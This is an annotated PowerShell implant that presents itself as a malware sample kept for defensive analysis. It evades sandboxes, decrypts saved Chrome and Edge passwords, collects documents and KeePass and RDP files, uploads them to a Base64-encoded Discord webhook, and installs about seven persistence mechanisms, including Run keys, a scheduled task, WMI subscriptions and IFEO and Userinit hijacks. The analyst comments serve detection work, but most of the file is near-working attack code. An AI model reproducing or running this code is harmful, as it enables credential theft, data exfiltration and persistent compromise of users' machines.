# --- CONFIG (Base64-encoded exfiltration endpoint) ---
# ANALYST NOTE: this file is a PowerShell credential-stealer / persistence
# implant. It is annotated here for defensive analysis only and is not meant
# to be run; the syntax gaps present in the sample as found (unclosed braces,
# array literals, param blocks and here-strings) have deliberately been left.
# $WEBHOOK is decoded at runtime (Base64 -> UTF-8) to a
# https://discord.com/api/webhooks/... URL. Treat the decoded URL as an IOC
# (block at the proxy, report to Discord for revocation), never as an endpoint.
$WEBHOOK = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String("aHR0cHM6Ly9kaXNjb3JkLmNvbS9hcGkvd2ViaG9va3MvMTM1NDkyNDU2MjkxMDgxMDExMi81OGM4WkVxQTV5SkQ4ZnN6RGJlZzJtYmg0cmJpVFJtZ0N0STQ0Rzc4czczSmQ4a2NyT2lqQ3hMbjZ3MFgtaC1EMlgxSA"))
# Gate read by Install-Persistence on its first line.
$PERSIST = $true
# Size cap applied by Find-InterestingFiles when choosing files to exfiltrate.
$MAX_FILE_SIZE = 10MB # 10MB max for Discord uploads
# ---
function Test-SafeEnvironment {
# ANALYST NOTE: sandbox / analysis-environment evasion (ATT&CK T1497).
# Every check calls `exit`, which terminates the whole script rather than
# returning a value, so the implant simply goes quiet in a suspected lab.
# Simple sandbox checks
# 1. Analyst-style account names.
if ($env:UserName -match "^(sandbox|malware|analysis)$") { exit }
# 2-3. Hypervisor strings in WMI hardware classes. Detection hook:
# powershell.exe querying Win32_ComputerSystem / Win32_BIOS right after
# launch is unusual for user-facing scripts.
if ((Get-WmiObject Win32_ComputerSystem).Model -match "Virtual|VMware|VBox") { exit }
if ((Get-WmiObject Win32_BIOS).SerialNumber -match "VMware|Virtual") { exit }
# 4. Managed debugger attached to this process.
if ([System.Diagnostics.Debugger]::IsAttached) { exit }
# Check for recent file creation (common in sandboxes)
# 5. Heuristic: more than 100 files created under the profile within the last
# 30 minutes is read as a freshly provisioned sandbox. This walks the whole
# profile recursively, so it is slow, and the burst of directory reads by
# powershell.exe is itself a detection opportunity.
$recentFiles = Get-ChildItem $env:USERPROFILE -Recurse -File |
Where-Object { $_.CreationTime -gt (Get-Date).AddMinutes(-30) }
if ($recentFiles.Count -gt 100) { exit }
# (closing brace missing in the sample as found)
# ---
function Get-BrowserCredentials {
# ANALYST NOTE: Credentials from Web Browsers (ATT&CK T1555.003).
# Copies the Chromium "Login Data" SQLite store for Chrome and Edge, reads the
# logins table and calls DPAPI Unprotect (CurrentUser scope) on password_value.
# Returns one "URL/User/Pass" record per row, joined by blank lines; an empty
# string if nothing was collected or every attempt failed.
$results = @()
# Chrome & Edge paths
$browserPaths = @(
"$env:LOCALAPPDATA\Google\Chrome\User Data\Default\Login Data",
"$env:LOCALAPPDATA\Microsoft\Edge\User Data\Default\Login Data"
# (array literal not closed in the sample as found)
foreach ($path in $browserPaths) {
try {
# Staged copy at %TEMP%\browser_<random>.db. Forensic artifact: the copy is
# removed only on the success path (Remove-Item below), so any failure inside
# this try leaves a browser_*.db holding the victim's login store in %TEMP%.
$tempCopy = "$env:TEMP\browser_$([System.IO.Path]::GetRandomFileName()).db"
Copy-Item $path -Destination $tempCopy -Force
# SQLite connection
# Add-Type -Path expects a path to an assembly file; the bare name used here
# resolves only if such a file is present in the working directory. A failure
# is swallowed by the catch below.
Add-Type -Path "System.Data.SQLite"
$conn = New-Object System.Data.SQLite.SQLiteConnection
$conn.ConnectionString = "Data Source=$tempCopy"
$conn.Open()
$cmd = $conn.CreateCommand()
$cmd.CommandText = "SELECT origin_url, username_value, password_value FROM logins"
$reader = $cmd.ExecuteReader()
while ($reader.Read()) {
$encrypted = $reader.GetValue(2)
# Direct DPAPI decrypt under the current user's key. NOTE(review): whether
# password_value is protected this way depends on the browser version; a
# failed Unprotect throws and the whole browser is silently skipped.
$plain = [System.Security.Cryptography.ProtectedData]::Unprotect(
$encrypted,
$null,
[System.Security.Cryptography.DataProtectionScope]::CurrentUser
)
# Plaintext passwords accumulate in memory here until exfiltration.
$results += "URL: $($reader[0])`nUser: $($reader[1])`nPass: $([Text.Encoding]::UTF8.GetString($plain))`n"
}
$conn.Close()
Remove-Item $tempCopy -Force
}
# Blanket swallow: missing profile, locked database, missing assembly and
# DPAPI failures all look the same to the caller ("no credentials").
catch { continue }
return $results -join "`n`n"
# ---
function Find-InterestingFiles {
# ANALYST NOTE: File and Directory Discovery / Data from Local System
# (ATT&CK T1083, T1005; T1039 for the share root). Besides documents it
# targets .rdp connection files and .kdbx KeePass databases, i.e. more
# credential material. Returns up to 10 FileInfo objects, newest first.
$paths = @(
"$env:USERPROFILE\Documents",
"$env:USERPROFILE\Desktop",
"$env:USERPROFILE\Downloads",
"\\Network\Shares" # placeholder UNC in this sample; the author intended real share paths here
# (array literal not closed in the sample as found)
$files = foreach ($path in $paths) {
# Recursive search with access/missing-path errors silenced, capped by the
# script-level $MAX_FILE_SIZE, at most 5 hits per root.
Get-ChildItem -Path $path -Include *.pdf, *.doc*, *.xls*, *.rdp, *.kdbx -Recurse -ErrorAction SilentlyContinue |
Where-Object { $_.Length -lt $MAX_FILE_SIZE } |
Select-Object -First 5
# Global cut to the 10 most recently modified files across all roots.
return $files | Sort-Object LastWriteTime -Descending | Select-Object -First 10
# ---
function Send-DiscordMessage {
# ANALYST NOTE: Exfiltration Over Web Service (ATT&CK T1567 / T1102).
# Hand-builds a multipart/form-data POST to the webhook in $WEBHOOK with a
# "content" text part and an optional "file" part. Returns $true when the
# POST did not throw, $false on any exception.
# Network detection hook: powershell.exe POSTing to discord.com/api/webhooks/.
param(
[string]$Message,
[string]$FilePath = $null
# (param block not closed in the sample as found)
# Random GUID as the MIME boundary.
$boundary = [System.Guid]::NewGuid().ToString()
$body = New-Object System.Text.StringBuilder
$body.AppendLine("--$boundary")
$body.AppendLine("Content-Disposition: form-data; name=`"content`"")
$body.AppendLine()
$body.AppendLine($Message)
if ($FilePath) {
# Whole file is read into memory.
$fileBytes = [System.IO.File]::ReadAllBytes($FilePath)
$fileName = (Get-Item $FilePath).Name
$body.AppendLine("--$boundary")
$body.AppendLine("Content-Disposition: form-data; name=`"file`"; filename=`"$fileName`"")
$body.AppendLine("Content-Type: application/octet-stream")
$body.AppendLine()
# The payload is appended as base64 TEXT despite the octet-stream header, so
# what lands in the channel is the base64 string rather than the raw file.
$body.AppendLine([Convert]::ToBase64String($fileBytes))
# Closing boundary appears to sit inside the file branch (braces are missing
# in the sample as found), so a text-only message would go out unterminated.
$body.AppendLine("--$boundary--")
try {
Invoke-RestMethod -Uri $WEBHOOK -Method Post `
-ContentType "multipart/form-data; boundary=$boundary" `
-Body $body.ToString()
return $true
# Any transport or HTTP error collapses to $false; the caller uses this as
# "C2 reachable" before installing persistence.
catch { return $false }
# ---
function Install-Persistence {
# ANALYST NOTE: two user-level autostarts, gated on the script-level $PERSIST.
# Both re-launch this same script file ($PSCommandPath) hidden with the
# execution policy bypassed, so they only work while the .ps1 stays on disk
# at its original path — a useful pivot when hunting for the dropped file.
if (-not $PERSIST) { return }
# Registry Run Key
# ATT&CK T1547.001. Value "WindowsUpdate" under HKCU\...\Run. Detection:
# Run values whose data contains "-Ep Bypass -W Hidden".
$regPath = "HKCU:\Software\Microsoft\Windows\CurrentVersion\Run"
$payload = "powershell -Ep Bypass -W Hidden -File `"$PSCommandPath`""
Set-ItemProperty -Path $regPath -Name "WindowsUpdate" -Value $payload -Force
# Scheduled Task
# ATT&CK T1053.005. Logon-triggered task named "MicrosoftEdgeUpdate" to
# blend in with the legitimate Edge updater; -Force overwrites any existing
# task of that name. Detection: task registration (Security 4698 /
# TaskScheduler operational log) whose action is powershell.exe with -File.
$action = New-ScheduledTaskAction -Execute "powershell.exe" `
-Argument "-Ep Bypass -W Hidden -File `"$PSCommandPath`""
$trigger = New-ScheduledTaskTrigger -AtLogOn
Register-ScheduledTask -TaskName "MicrosoftEdgeUpdate" `
-Action $action -Trigger $trigger -Force | Out-Null
# (closing brace missing in the sample as found)
1. WMI
2. COM
4. IFEO
function Add-WmiPersistence {
# ANALYST NOTE: WMI Event Subscription persistence (ATT&CK T1546.003).
# Creates an __EventFilter, a CommandLineEventConsumer and the binding
# between them in root\subscription. Writing there normally requires
# administrative rights, and the consumer is executed by the WMI provider
# host rather than from the user's session (NOTE(review): confirm for the
# target build). Detection: Sysmon 19/20/21 (WmiEventFilter / Consumer /
# Binding) and any CommandLineEventConsumer that launches powershell.exe.
# Persistent WMI event that survives reboots
# Random 4-digit suffix so the object names differ per infection.
$filterName = "WindowsUpdateDrivers_" + (Get-Random -Minimum 1000 -Maximum 9999)
$consumerName = "WindowsUpdateEater_" + (Get-Random -Minimum 1000 -Maximum 9999)
$eventFilter = @{
EventNamespace = 'root\subscription'
Name = $filterName
# Polls every 60 s for a change to the PerfOS_System counter instance, i.e.
# effectively "fire about once a minute, forever". NOTE(review): the
# EventNamespace above is the subscription namespace itself, not the one
# the queried perf class lives in; confirm the filter actually fires before
# rating this as working persistence.
Query = "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'"
QueryLanguage = 'WQL'
# (hashtable not closed in the sample as found)
$eventConsumer = @{
Name = $consumerName
CommandLineTemplate = "powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -File `"$PSCommandPath`""
# (hashtable not closed in the sample as found)
$filter = Set-WmiInstance -Namespace $eventFilter.EventNamespace -Class '__EventFilter' -Arguments $eventFilter
$consumer = Set-WmiInstance -Namespace $eventFilter.EventNamespace -Class 'CommandLineEventConsumer' -Arguments $eventConsumer
$binding = Set-WmiInstance -Namespace $eventFilter.EventNamespace -Class '__FilterToConsumerBinding' -Arguments @{
Filter = $filter
Consumer = $consumer
# (hashtable and function not closed in the sample as found)
function Add-ComHijackPersistence {
# ANALYST NOTE: COM Hijacking (ATT&CK T1546.015) through HKCU\Software\Classes,
# which takes precedence over HKLM for the current user and needs no elevation.
# As written the CLSID is all zeros (not the MMC snap-in the original comment
# claims) and InprocServer32 is given a powershell command line where COM
# expects a DLL path, so nothing would load it — treat as a scaffold /
# intent indicator. Detection: new InprocServer32 keys under HKCU\...\CLSID.
# Hijack MMC snap-in load behavior
$payload = "powershell.exe -WindowStyle Hidden -File `"$PSCommandPath`""
$regPath = "HKCU:\Software\Classes\CLSID\{00000000-0000-0000-0000-000000000000}\InprocServer32"
New-Item -Path $regPath -Force | Out-Null
Set-ItemProperty -Path $regPath -Name "(Default)" -Value $payload -Force
Set-ItemProperty -Path $regPath -Name "ThreadingModel" -Value "Apartment" -Force
# (closing brace missing in the sample as found)
function Add-ExplorerShellExtension {
# ANALYST NOTE: user-triggered execution rather than an autostart. Adds an
# Explorer context-menu verb "OpenWithMalware" on every file type (the `*`
# class) whose command runs this script hidden with the clicked file as %1.
# Detection: new verbs under HKCU\Software\Classes\*\shell\<name>\command.
# NOTE(review): `*` is a wildcard to the registry provider's -Path; whether
# New-Item creates the literal `*` key as written is unverified.
# Explorer context menu handler
$regPath = "HKCU:\Software\Classes\*\shell\OpenWithMalware\command"
$payload = "`"powershell.exe`" -WindowStyle Hidden -File `"$PSCommandPath`" `"%1`""
New-Item -Path $regPath -Force | Out-Null
Set-ItemProperty -Path $regPath -Name "(Default)" -Value $payload -Force
# (closing brace missing in the sample as found)
function Add-IFEOHijack {
# ANALYST NOTE: Image File Execution Options Injection (ATT&CK T1546.012).
# Sets a Debugger value for notepad.exe under HKLM, so each launch of Notepad
# starts this script instead; the HKLM write succeeds only when elevated.
# Windows hands the original command line to the "debugger", which here
# never re-launches notepad.exe, so Notepad visibly stops opening for every
# user — noisy, and a likely help-desk symptom.
# Detection: Sysmon 13 on ...\Image File Execution Options\*\Debugger.
# Image File Execution Options debugger
$targetBinary = "notepad.exe" # Common benign target
$regPath = "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\$targetBinary"
$payload = "`"powershell.exe`" -WindowStyle Hidden -File `"$PSCommandPath`""
New-Item -Path $regPath -Force -ErrorAction SilentlyContinue | Out-Null
Set-ItemProperty -Path $regPath -Name "Debugger" -Value $payload -Force
# (closing brace missing in the sample as found)
function Add-OfficeAddinPersistence {
# ANALYST NOTE: Office Application Startup (ATT&CK T1137). Intends a Word
# AutoOpen macro dropped under %APPDATA%\Microsoft\Word\STARTUP.
# As written it writes the VBA source as plain text to a file named
# Normal.dotm via Out-File, which is not a valid Word template, and the
# expanded $payload carries its own double quotes into the VBA string
# literal. This function is also never called from MAIN. Intent indicator.
# The here-string below is never terminated ("@ missing) in the sample as found.
# Word startup add-in
$officePath = [Environment]::GetFolderPath('ApplicationData') + "\Microsoft\Word\STARTUP\"
$payload = "powershell.exe -WindowStyle Hidden -File `"$PSCommandPath`""
$vbaCode = @"
Sub AutoOpen()
CreateObject("WScript.Shell").Run "$payload", 0
End Sub
New-Item -Path $officePath -ItemType Directory -Force | Out-Null
$vbaCode | Out-File "$officePath\Normal.dotm" -Force
function Add-UserInitHijack {
# ANALYST NOTE: Winlogon Helper / Userinit (ATT&CK T1547.004). Appends this
# script to the machine-wide Userinit value (HKLM, so elevated only);
# Winlogon runs each comma-separated entry at every interactive logon.
# Destructive risk: a malformed Userinit value can break logon for all users.
# Detection: Sysmon 13 on Winlogon\Userinit with anything beyond the stock
# userinit.exe entry.
# Userinit MPR Logon Script
$regPath = "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"
# Reads the current value so the legitimate entry is kept...
$original = (Get-ItemProperty -Path $regPath -Name Userinit).Userinit
# ...then appends ", powershell.exe ...". NOTE(review): the stock value
# already ends in a comma, so this likely yields a doubled comma — confirm.
$payload = "$original, powershell.exe -WindowStyle Hidden -File `"$PSCommandPath`""
Set-ItemProperty -Path $regPath -Name "Userinit" -Value $payload -Force
# (closing brace missing in the sample as found)
# --- MAIN ---
# ANALYST NOTE: execution order is evade -> collect -> exfiltrate -> persist
# -> clean up. Persistence is installed ONLY if the first webhook POST
# reports success, so the implant needs a reachable C2 before digging in.
Test-SafeEnvironment
# Collect data
$creds = Get-BrowserCredentials
$files = Find-InterestingFiles
# Create report
# Plaintext report: user, host, domain, decrypted browser credentials and
# the paths of the files about to be uploaded. The here-string below is never
# terminated ("@ missing) in the sample as found.
# Forensic artifact: it is staged at %TEMP%\system_report_<yyyyMMdd>.txt and
# removed only by the very last statement, so it survives if anything in
# between aborts.
$report = @"
=== COMPROMISED SYSTEM ===
User: $env:USERNAME
Host: $env:COMPUTERNAME
Domain: $env:USERDOMAIN
=== CREDENTIALS ===
$creds
=== FILES FOUND ===
$($files.FullName -join "`n")
$reportPath = "$env:TEMP\system_report_$(Get-Date -Format 'yyyyMMdd').txt"
$report | Out-File $reportPath
# Exfiltrate
# Beacon "New infection: <hostname>" with the report attached; on success,
# each discovered document / .rdp / .kdbx is uploaded separately.
if (Send-DiscordMessage -Message "New infection: $env:COMPUTERNAME" -FilePath $reportPath) {
foreach ($file in $files) {
Send-DiscordMessage -Message "Collected file: $($file.Name)" -FilePath $file.FullName
# Persistence stack (Add-OfficeAddinPersistence is defined but not called).
# Add-WmiPersistence, Add-UserInitHijack and Add-IFEOHijack target
# root\subscription / HKLM and normally need elevation; without it they
# emit non-terminating errors and the script carries on.
Install-Persistence
Add-WmiPersistence
Add-UserInitHijack
Add-IFEOHijack
Add-ComHijackPersistence
Add-ExplorerShellExtension
# Anti-forensics: delete the staged report (the browser_*.db copies from
# Get-BrowserCredentials are not covered here).
Remove-Item $reportPath -Force